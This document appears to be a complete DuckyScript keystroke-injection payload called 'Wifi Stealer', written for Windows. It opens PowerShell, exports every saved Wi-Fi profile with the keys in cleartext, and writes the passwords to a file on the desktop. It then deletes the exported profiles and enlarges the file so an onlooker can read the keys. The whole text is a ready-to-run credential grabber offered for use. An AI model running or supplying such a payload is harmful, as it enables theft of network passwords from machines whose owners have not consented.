REM Title: Wifi Stealer
REM Author: 7h30th3r0n3
REM Target:  Windows 7/8/10/11 
REM Version: 1.1
REM Category: Grabber
REM Extracts the SSID and wifi shared key and puts them in a txt file named 0.txt on the desktop, then it opens the file and zooms in
REM Designed to be used for mouse hijacking on a machine whose screen is visible
GUI r
DELAY 500
STRING powershell 
ENTER
DELAY 500
STRING cd Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit
ENTER
GUI m
DELAY 4000
STRING 0
DELAY 100
ENTER
DELAY 200
GUI UPARROW
DELAY 100
CTRL =
CTRL =
CTRL =
CTRL =
CTRL =
DELAY 10000
ALT F4
CTRL D